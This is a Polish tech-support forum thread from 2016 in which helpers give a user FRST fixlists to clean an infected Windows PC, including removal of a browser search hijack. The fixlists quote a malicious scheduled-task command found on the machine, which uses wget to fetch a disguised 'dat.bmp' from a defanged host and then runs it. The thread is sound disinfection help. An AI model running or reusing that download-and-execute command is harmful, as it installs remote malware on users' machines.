Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Chrome - lpeeaghdjmhlakojjcgfdhgcejdaefmi

goduraa 19 Wrz 2016 18:18 489 7
  • Pomocny post
    #2 19 Wrz 2016 20:27
    Acorus 20
    Spec od komputerów

    Otwórz notatnik systemowy i wklej:

    Cytat:
    Task: {C614125A-8834-4F15-A25B-29FCB14D9767} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=qzoEOEnU4ziQmWF0Fl6F;AVCI;1472155032 &amp; start cmd /R dat.bmp <==== UWAGA
    AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Brak pliku
    AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-2363178074-3724925634-181798709-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.findeer.com/?h=532ADDC2D8A7BD56...1-b0a3-2c54a1e26a56&c=313936&s=313031
    FF Homepage: hxxp://search.findeer.com/?h=532ADDC2D8A7BD56...1-b0a3-2c54a1e26a56&c=313936&s=313031
    CHR HKLM\...\Chrome\Extension: [lpeeaghdjmhlakojjcgfdhgcejdaefmi] - hxxps://chrome.google.com/webstore/detail/lpeeaghdjmhlakojjcgfdhgcejdaefmi
    CHR HKLM-x32\...\Chrome\Extension: [lpeeaghdjmhlakojjcgfdhgcejdaefmi] - hxxps://chrome.google.com/webstore/detail/lpeeaghdjmhlakojjcgfdhgcejdaefmi
    S4 nvpciflt; \SystemRoot\system32\DRIVERS\nvpciflt.sys [X]
    S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
    2016-09-19 17:32 - 2016-09-19 17:36 - 00000000 ____D C:\AdwCleaner
    EmptyTemp:


    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix/Napraw.

    0
  • Pomocny post
    #3 19 Wrz 2016 20:31
    Kolobos
    Spec od komputerów

    lpeeaghdjmhlakojjcgfdhgcejdaefmi to dodatek kasperskiego, dlaczego chcesz go usunac?






    Odinstaluj Loaris Trojan Remover 2.0.18

    Wykonaj Fixlist.txt dla FRST:
    Task: {C614125A-8834-4F15-A25B-29FCB14D9767} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=qzoEOEnU4ziQmWF0Fl6F;AVCI;1472155032 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: {DC763CA1-FDD7-4D56-B972-DA9921FAFCB2} - System32\Tasks\{A788F9C3-DDC4-4642-9CDE-1B4AD60FECE6} => pcalua.exe -a "C:\Users\a\Downloads\Release\NVIDIA Driver Uninstaller.exe" -d C:\Users\a\Downloads\Release
    AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Brak pliku
    AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => Brak pliku
    HKU\S-1-5-21-2363178074-3724925634-181798709-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.findeer.com/?h=532ADDC2D8A7BD56...1-b0a3-2c54a1e26a56&c=313936&s=313031
    BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x64\IEExt\OnlineBanking\online_banking_bho.dll => Brak pliku
    BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\OnlineBanking\online_banking_bho.dll => Brak pliku
    FF Homepage: hxxp://search.findeer.com/?h=532ADDC2D8A7BD56...1-b0a3-2c54a1e26a56&c=313936&s=313031
    FF user.js: detected! => C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles\60rwdy3b.default\user.js [2016-02-23]
    S4 nvpciflt; \SystemRoot\system32\DRIVERS\nvpciflt.sys [X]
    S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
    EmptyTemp:

    W FRST wybierz Napraw.

    Usun katalog C:\FRST.

    0
  • #4 19 Wrz 2016 22:03
    goduraa
    Poziom 7  

    Dziekuje za odpowiedzi.
    Z tego co rozumiem musialem wybrac ktorys z dwoch podeslanych fix-ow. Wybralem ten drugi od Kolobos.

    W chromie nadal widze inna czcionke i troche inne ikony.

    lpeeaghdjmhlakojjcgfdhgcejdaefmi chcialem sie pozbyc, gdyz Loaris wykrywal mi to jako zagrozenie. Z tego co widze to fix Acorus 20 tez zawiera wzmianke o tym chrome extension.

    Dodano po 59 [minuty]:

    Ponownie przeskanowalem MBAM'em i AdwCleaner. Nastepnie FRST i w zalacznikach nowe pliki z tego ostatniego.
    Pozdrawiam

    0
  • Pomocny post
    #5 19 Wrz 2016 23:03
    Kolobos
    Spec od komputerów

    Odinstaluj Popcorn Time

    > W chromie nadal widze inna czcionke i troche inne ikony.

    Sprobuj zresetowac ustawienia Chrome do ustawien domyslnych.

    0
  • #6 19 Wrz 2016 23:50
    goduraa
    Poziom 7  

    Popcorn time juz wczesniej usunalem (dopiero teraz w odinstaluj programy).
    Przywrocenie do ustawien fab. chrome nie zmienia ani ikon ani czcionki.
    Zamieszczam screena ikon.

    0
  • Pomocny post
    #7 20 Wrz 2016 00:08
    Kolobos
    Spec od komputerów

    Nie wiem o co Ci chodzi, czcionka i ikony sa normalne.

    0
  • #8 20 Wrz 2016 11:11
    goduraa
    Poziom 7  

    Ok, w takim razie to tyle. Dziekuje za pomoc.

    0